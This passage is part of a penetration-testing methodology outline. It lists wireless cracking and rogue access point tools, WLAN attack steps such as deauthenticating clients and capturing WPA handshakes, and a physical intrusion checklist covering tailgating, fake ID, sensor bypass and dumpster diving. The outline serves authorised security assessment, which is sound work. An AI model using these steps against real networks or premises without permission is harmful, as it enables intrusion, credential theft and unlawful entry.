15.2.5.2. Aircrack-ptw

15.2.5.3. Aircrack-ng

15.2.5.4. Airsnort

15.2.5.5. cowpatty

15.2.5.6. FiOS Wireless Key Calculator

15.2.5.7. iWifiHack

15.2.5.8. KisMAC-ng

15.2.5.9. Rainbow Tables

15.2.5.10. wep attack

15.2.5.11. wep crack

15.2.5.12. wzcook

15.2.6. Frame Generation Software

15.2.6.1. Airgobbler

15.2.6.2. airpwn

15.2.6.3. Airsnarf

15.2.6.4. Commview

15.2.6.5. fake ap

15.2.6.6. void 11

15.2.6.7. wifi tap

15.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

15.2.6.8. FreeRADIUS - Wireless Pwnage Edition

15.2.7. Mapping Software

15.2.7.1. Online Mapping

15.2.7.1.1. WIGLE

15.2.7.1.2. Skyhook

15.2.7.2. Tools

15.2.7.2.1. Knsgem

15.2.8. File Format Conversion Tools

15.2.8.1. ns1 recovery and conversion tool

15.2.8.2. warbable

15.2.8.3. warkizniz

15.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

15.2.8.4. ivstools

15.2.9. IDS Tools

15.2.9.1. WIDZ

15.2.9.2. War Scanner

15.2.9.3. Snort-Wireless

15.2.9.4. AirDefense

15.2.9.5. AirMagnet

15.3. WLAN discovery

15.3.1. Unencrypted WLAN

15.3.1.1. Visible SSID

15.3.1.1.1. Sniff for IP range

15.3.1.2. Hidden SSID

15.3.1.2.1. Deauth client

15.3.2. WEP encrypted WLAN

15.3.2.1. Visible SSID

15.3.2.1.1. WEPattack

15.3.2.2. Hidden SSID

15.3.2.2.1. Deauth client

15.3.3. WPA / WPA2 encrypted WLAN

15.3.3.1. Deauth client

15.3.3.1.1. Capture EAPOL handshake

15.3.4. LEAP encrypted WLAN

15.3.4.1. Deauth client

15.3.4.1.1. Break LEAP

15.3.5. 802.1x WLAN

15.3.5.1. Create Rogue Access Point

15.3.5.1.1. Airsnarf

15.3.5.1.2. fake ap

15.3.5.1.3. Hotspotter

15.3.5.1.4. Karma

15.3.5.1.5. Linux rogue AP

15.3.6. Resources

15.3.6.1. URLs

15.3.6.1.1. Wirelessdefence.org

15.3.6.1.2. Russix

15.3.6.1.3. Wardrive.net

15.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

15.3.6.2. White Papers

15.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

15.3.6.2.2. 802.11b Firmware-Level Attacks

15.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

15.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

15.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds

15.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

15.3.6.2.7. Active behavioral fingerprinting of wireless devices

15.3.6.3. Common Vulnerabilities and Exploits (CVE)

15.3.6.3.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

16. Physical Security

16.1. Building Security

16.1.1. Meeting Rooms

16.1.1.1. Check for active network jacks.

16.1.1.2. Check for any information in room.

16.1.2. Lobby

16.1.2.1. Check for active network jacks.

16.1.2.2. Does receptionist/guard leave lobby?

16.1.2.3. Accessible printers? Print a test page.

16.1.2.4. Obtain phone/personnel listing.

16.1.3. Communal Areas

16.1.3.1. Check for active network jacks.

16.1.3.2. Check for any information in room.

16.1.3.3. Listen for employee conversations.

16.1.4. Room Security

16.1.4.1. Resistance of lock to picking.

16.1.4.1.1. What types of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?

16.1.4.2. Ceiling access areas.

16.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

16.1.5. Windows

16.1.5.1. Check windows/doors for visible intruder alarm sensors.

16.1.5.2. Check visible areas for sensitive information.

16.1.5.3. Can you video users logging on?

16.2. Perimeter Security

16.2.1. Fence Security

16.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

16.2.2. Exterior Doors

16.2.2.1. If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored, etc.

16.2.3. Guards

16.2.3.1. Patrol Routines

16.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

16.2.3.2. Communications

16.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.

16.3. Entry Points

16.3.1. Guarded Doors

16.3.1.1. Piggybacking

16.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.

16.3.1.2. Fake ID

16.3.1.2.1. Attempt to use fake ID to gain access.

16.3.1.3. Access Methods

16.3.1.3.1. Test 'out of hours' entry methods

16.3.2. Unguarded Doors

16.3.2.1. Identify all unguarded entry points.

16.3.2.1.1. Are doors secured?

16.3.2.1.2. Check locks for resistance to lock picking.

16.3.3. Windows

16.3.3.1. Check windows/doors for visible intruder alarm sensors.

16.3.3.1.1. Attempt to bypass sensors.

16.3.3.2. Check visible areas for sensitive information.

16.4. Office Waste

16.4.1. Dumpster Diving. Attempt to retrieve any useful information from ToE refuse. This may include printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs, etc.

17. Final Report - template

18. Contributors

18.1. Matt Byrne (WirelessDefence.org)

18.1.1. Matt contributed the majority of the Wireless section.

18.2. Arvind Doraiswamy (Paladion.net)

18.2.1. Arvind kindly contributed the associated MySQL section, used when TCP port 3306 is found open.

18.3. Lee Lawson (Dns.co.uk)

18.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

18.4. Nabil OUCHN (Security-database.com)

18.4.1. Nabil contributed the AS/400 section.